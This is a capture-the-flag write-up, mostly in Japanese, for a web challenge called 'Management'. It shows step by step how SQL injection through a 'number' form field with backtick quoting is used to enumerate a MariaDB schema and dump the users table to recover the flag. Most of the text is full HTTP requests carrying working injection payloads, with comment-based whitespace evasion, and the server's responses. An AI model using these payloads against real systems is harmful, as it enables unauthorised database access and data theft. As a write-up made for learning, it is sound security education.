Tags: web sqli
Rating:
# ▼▼▼Management(Web:60)、51/484=10.5%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
---
```
I've created a new website so you can do all your important management. It includes users, creating things, reading things, and... well, not much else. Maybe there's a flag?
Second instance running at 52.90.229.46:8558
tpctf{san1t1z3_y0ur_1npu7s} is not the correct flag. Look harder ;)
Note: the flag format is flag{}, not the usual tpctf{}
Author: Kevin Higgs
Hint
・Those names seem interesting...
・hint.png
mariaDB[sqli]> SELECT * from users;
+-------------+---+---+---+---+---+---+---+---+---+
| name | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
+-------------+---+---+---+---+---+---+---+---+---+
|custom-kevin | | | | | | | | | |
```
-----
### 【機能を把握する】
・ログイン機能
・1~9の数字を選択して、Createしてデータベースに書き込む機能
・1~9の数字を選択して、Readでデータベースから読み込む機能
-----
まずは`1`に`testtest1`とデータを登録してみる。
↓
```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 38
number=1&value=testtest1&action=Create
```
↓
```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8
<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>
Value (if creating): <input type='text' name='value'></input>
<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```
-----
次に、`1`からデータを読み込んでみる
↓
```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 31
number=1&value=test&action=Read
```
↓
```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8
SELECT `1` FROM users WHERE name = 'custom-test';Result: testtest1<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>
Value (if creating): <input type='text' name='value'></input>
<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```
↓
下記のようなSQL文が表示されて、`testtest1`が取得できた。
```
SELECT `1` FROM users WHERE name = 'custom-test';Result: testtest1
```
↓
`Cookie: user`と`number`がSQL文に挿入されるようだ
-----
### 【脆弱性を探す】
`Cookie: user`はシングルクウォートがエスケープ処理されていた。
`number`はインジェクションできるようだ。
-----
### 【データを取得する】
Hintに`MariaDB`との記載がある。
↓
`users`以外のテーブル名を取得しに行く
↓
```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 111
number=table_name`+from+information_schema.tables+where+table_schema=database()+limit+0,1--+&value=&action=Read
```
↓
```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8
SELECT `table_name` from information_schema.tables where table_schema=database() limit 0,1-- ` FROM users WHERE name = 'custom-test';Result: users<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>
Value (if creating): <input type='text' name='value'></input>
<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```
↓
`limit 0,1` ⇒ `Result: users`
`limit 1,1` ⇒ `Result:`
↓
`users`テーブルのみであることがわかった
---
`name`,`1`~`9`以外のカラム名を取得しに行く
↓
```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 122
number=column_name`from/**/information_schema.columns/**/where/**/table_name='users'/**/limit/**/0,1--+&value=&action=Read
```
↓
```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8
SELECT `column_name`from/**/information_schema.columns/**/where/**/table_name='users'/**/limit/**/0,1-- ` FROM users WHERE name = 'custom-test';Result: name<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>
Value (if creating): <input type='text' name='value'></input>
<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```
↓
```
SELECT `column_name`from/**/information_schema.columns/**/where/**/table_name='users'/**/limit/**/0,1-- ` FROM users WHERE name = 'custom-test';Result: name
```
limit句を1つずつ増やしてカラム名を全て取得していく。
`/limit/**/0,1` ⇒ `Result: name`
`/limit/**/1,1` ⇒ `Result: 1`
`/limit/**/2,1` ⇒ `Result: 2`
`/limit/**/3,1` ⇒ `Result: 3`
`/limit/**/4,1` ⇒ `Result: 4`
`/limit/**/5,1` ⇒ `Result: 5`
`/limit/**/6,1` ⇒ `Result: 6`
`/limit/**/7,1` ⇒ `Result: 7`
`/limit/**/8,1` ⇒ `Result: 8`
`/limit/**/9,1` ⇒ `Result: 9`
`/limit/**/10,1` ⇒ `Result:`
↓
結局、カラムは`name`,`1`~`9`のみであった。
---
次に、`name`カラムの値を取得しに行く ※Hintを見ていれば、ここからできる
↓
```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 63
number=name`from/**/users/**/limit/**/0,1--+&value=&action=Read
```
↓
```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8
SELECT `name`from/**/users/**/limit/**/0,1-- ` FROM users WHERE name = 'custom-test';Result: custom-Hi<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>
Value (if creating): <input type='text' name='value'></input>
<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```
↓
`/limit/**/0,1--+` ⇒ `Result: custom-Hi`
`/limit/**/1,1--+` ⇒ `Result: flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!!}`
↓
`flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!!}`
